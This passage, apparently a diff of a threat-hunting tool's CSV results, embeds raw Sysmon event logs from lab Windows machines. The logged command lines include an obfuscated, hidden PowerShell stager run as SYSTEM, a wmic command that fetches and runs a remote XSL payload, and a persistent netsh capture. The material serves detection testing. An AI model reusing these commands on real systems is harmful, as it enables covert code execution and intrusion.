+    <Data Name=""CommandLine"">powershell.exe  -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-2586-5CC9-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-AF8B-5CC8-0000-00101C1A1900</Data>
+    <Data Name=""ParentProcessId"">3348</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436038.286383,2019-07-30T01:33:58.286383+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd  /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:58.256845Z"">
+    </TimeCreated>
+    <EventRecordID>4945</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:58.245</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-0010E32E8B00</Data>
+    <Data Name=""ProcessId"">5084</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd  /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl    </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
+    <Data Name=""ParentProcessId"">1208</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556656012.106089,2019-05-01T00:26:52.106089+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-30T20:26:52.090464Z"">
+    </TimeCreated>
+    <EventRecordID>9807</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1964"" ThreadID=""1664"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-04-30 20:26:51.949</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AF8B-5CC8-0000-00101C1A1900</Data>
+    <Data Name=""ProcessId"">3348</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c &quot;if([IntPtr]::Size -eq 4){$b=&apos;powershell.exe&apos;}else{$b=$env:windir+&apos;\syswow64\WindowsPowerShell\v1.0\powershell.exe&apos;};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments=&apos;-noni -nop -w hidden -c &amp;([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(&apos;&apos;H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==&apos;&apos;))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))&apos;;$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle=&apos;Hidden&apos;;$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-2586-5CC9-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2586-5CC9-0000-0010DC530000</Data>
+    <Data Name=""ParentProcessId"">460</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1594332063.89924,2020-07-10T02:01:03.899240+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-07-09T22:01:03.898570Z"">
+    </TimeCreated>
+    <EventRecordID>311373</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3280"" ThreadID=""1044"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-07-09 22:01:03.894</Data>
+    <Data Name=""ProcessGuid"">747F3D96-939F-5F07-0000-0010888E4600</Data>
+    <Data Name=""ProcessId"">7456</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">PowerShell.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-86FA-5F07-0000-00204A8B0600</Data>
+    <Data Name=""LogonId"">0x68b4a</Data>
+    <Data Name=""TerminalSessionId"">2</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-86FC-5F07-0000-00101E4B0700</Data>
+    <Data Name=""ParentProcessId"">2356</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1564436034.630548,2019-07-30T01:33:54.630548+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic  process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:54.246154Z"">
+    </TimeCreated>
+    <EventRecordID>4941</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:54.044</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6642-5D3F-0000-0010F69D8A00</Data>
+    <Data Name=""ProcessId"">4896</Data>
+    <Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">WMI Commandline Utility</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">wmic  process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6641-5D3F-0000-0010A38C8A00</Data>
+    <Data Name=""ParentProcessId"">4260</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1138] Application Shimming - process,1553028567.80776,2019-03-20T00:49:27.807760+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
